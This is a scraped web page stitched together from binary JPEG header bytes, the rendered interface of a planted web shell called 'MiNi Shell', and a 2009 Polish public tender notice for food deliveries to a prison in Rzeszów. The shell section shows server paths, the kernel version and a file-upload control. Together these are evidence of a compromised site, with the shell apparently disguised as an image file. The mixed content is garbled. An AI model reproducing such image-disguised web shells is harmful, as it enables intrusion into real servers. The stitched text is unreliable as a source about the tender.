JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/30948-N-2009.html

<p class="kh_header"><b>Rzeszów: Dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 30948 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rzeszowie , ul. Załęska 76, 35-322 Rzeszów, woj. podkarpackie, tel. 017 8580700 w. 769.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykułów spożywczych do magazynu Zamawiającego w asortymencie i ilościach określonych w  załączniku nr 1,2,3,4,5 i 6 do SIWZ (warzywa mrożone, warzywa  konserwowe, warzywa kiszone, dżemy, produkty sojowe).
Szczegółowe zapisy związane ze sposobem realizacji zamówienia , warunkami umowy zawiera załącznik nr 14 ( projekt umowy ) do SIWZ.

TABELA Z ZAŁĄCZNIKA NR 1 DO SIWZ,
Lp.	Asortyment, KOD CPV, Jednostka miary,	Ilość, 

1.	Groszek zielony mrożony,	15331170-9,	kg	650;
2.	Kalafior mrożony,	15331170-9,	kg	700;
3.	Paprykarz mrożony,	15331170-9,	kg	750;
4.	Mieszanka chińska mrożona,	15331170-9,	kg	300;
5.	Sałatka meksykańska mrożona,	15331170-9,	kg	340;
6.	Fasolka szparagowa mrożona,	15331170-9,	kg	650;
                                                  
TABELA Z ZAŁĄCZNIKA NR 2 DO SIWZ,
Lp.	Asortyment, 	KOD CPV,	 Jednostka miary,	Ilość,  

1.	Leczo pieczarkowe -op. do 5 kg, 	15331135-2,	kg	3 400;
2.	Koncentrat pomidorowy 30% - op. do 5 kg, 15331425-2, kg 3 200;
3.	Sałatka szwedzka - op. do 5 kg,	15331400-1,	kg	1 950;

TABELA Z ZAŁĄCZNIKA NR 3 DO SIWZ,
Lp.	Asortyment, 	KOD CPV,	 Jednostka miary,	Ilość, 

1.	Kukurydza konserwowa  - op. do 2 kg, 15331460-9,	kg	1 750;
2.	Chrzan tarty - op. do 2 kg,	15331500-2,	kg	 1 450;
3.	Syrop wieloowocowy (sok),	 15321000-4,	kg	1 850;

      TABELA Z ZAŁĄCZNIKA NR 4 DO SIWZ,
Lp.	Asortyment, 	KOD CPV,	 Jednostka miary,	Ilość,
1.	Ogórek kiszony ( w beczkach ),	15331000-7,	kg	8 400;
2.	Kapusta kiszona ( w beczkach ),  15331142-4,	kg	14 600;

TABELA Z ZAŁĄCZNIKA NR 5 DO SIWZ,
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Marmolada wieloowocowa - op. do 15 kg,  15332230-5,	kg 2 100;
2.	Dżem wieloowocowy - op. do 15 kg,	15332290-3,	kg 2 550;
3.	Dżem truskawkowy - op. do 15 kg,	15332296-5,	kg 2 050;
4.	Powidła śliwkowe - op. do 15 kg,	15332200-6,	kg 1 800;

      TABELA Z ZAŁĄCZNIKA NR 6 DO SIWZ,
Lp.	Asortyment,  KOD CPV,  Jednostka miary, Ilość, 

1.	Kostka sojowa,	15800000-6,	kg	800;
2.	Granulat sojowy,	15800000-6,	kg	600;
3.	Kotlety sojowe,	15800000-6,	kg	400;
  
     Określona powyżej  ilość towaru  jest  wielkością szacunkową. Zamawiający informuje, że rzeczywista ilość pobranych artykułów może odbiegać od ilości planowanej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9, 15.33.11.35-2, 15.33.14.25-2, 15.33.14.00-1, 15.33.14.60-9, 15.33.15.00-2, 15.32.10.00-4, 15.33.10.00-7, 15.33.11.42-4, 15.33.22.30-5, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.00-6, 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie wymaga się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, art. 22.1.1) ustawy Prawo zam. Publicznych (Dz. U. z  2007r. nr 223 poz. 1655 z późn. zm.)
- do oferty należy dołączyć aktualny odpis z właściwego rejestru  lub aktualne zaświadczenie   o  wpisie do ewidencji działalności gospodarczej, ww. dokumenty muszą być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, art. 22.1.2)  ustawy Prawo zam. publ.
      - do oferty należy dołączyć pisemne oświadczenie Wykonawcy w przedmiocie sprawy: zał. nr 13 do SIWZ, 
c) znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia, art. 22.1.3) ustawy  Prawo zam. publ.
    - do oferty należy dołączyć pisemne oświadczenie Wykonawcy - zał. nr 13 do SIWZ,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych
    - do oferty należy dołączyć pisemne oświadczenie Wykonawcy - zał. nr 13 do SIWZ,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć aktualny odpis z właściwego rejestru  lub aktualne zaświadczenie   o  wpisie do ewidencji działalności gospodarczej, ww. dokumenty muszą być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz pisemne oświadczenie  Wykonawcy w zakresie art. 22 i art. 24 ustawy Prawo zamówień publicznych - zał. nr 13 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rzeszowie, 35-322 Rzeszów, ul. Załęska 76.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 11:00, miejsce: Oferty należy składać w sekretariacie Zakładu Karnego w Rzeszowie, 35 - 322 Rzeszów, ul. Załęska 76 w terminie do dnia 26.02.2009r. do godz. 11:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy warzyw mrożonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość, 

1.	Groszek zielony mrożony,	15331170-9,	kg	650;
2.	Kalafior mrożony,	15331170-9,	kg	700;
3.	Paprykarz mrożony,	15331170-9,	kg	750;
4.	Mieszanka chińska mrożona,	15331170-9,	kg	300;
5.	Sałatka meksykańska mrożona,	15331170-9,	kg	340;
6.	Fasolka szparagowa mrożona,	15331170-9,	kg	650;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa warzyw konserwowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość,  

1.	Leczo pieczarkowe -op. do 5 kg, 	15331135-2,	kg	3 400;
2.	Koncentrat pomidorowy 30% - op. do 5 kg, 15331425-2, kg 3 200;
3.	Sałatka szwedzka - op. do 5 kg,	15331400-1,	kg	1 950;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.35-2, 15.33.14.25-2, 15.33.14.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy warzyw konserwowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość,  

1.	Kukurydza konserwowa  - op. do 2 kg,	15331460-9, kg	1 750;
2.	Chrzan tarty - op. do 2 kg,	15331500-2,	kg	 1 450;
3.	Syrop wieloowocowy (sok),	 15321000-4,	kg	1 850;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.14.60-9, 15.33.15.00-2, 15.32.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy warzyw kiszonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość,  

1.	Ogórek kiszony ( w beczkach ),	15331000-7, kg	8 400;
2.	Kapusta kiszona ( w beczkach ),	15331142-4, kg	14 600;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.10.00-7, 15.33.11.42-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy dżemów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość , 

1.	Marmolada wieloowocowa - op. do 15 kg, 15332230-5, kg 2 100;
2.	Dżem wieloowocowy - op. do 15 kg,	15332290-3, kg	2 550;
3.	Dżem truskawkowy - op. do 15 kg,	15332296-5, kg	2 050;
4.	Powidła śliwkowe - op. do 15 kg,	15332200-6, kg	1 800;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.22.30-5, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy produktów sojowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment,  KOD CPV,  Jednostka miary, Ilość,  

1.	Kostka sojowa,	15800000-6,	kg	800;
2.	Granulat sojowy,	15800000-6,	kg	600;
3.	Kotlety sojowe,	15800000-6,	kg	400;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com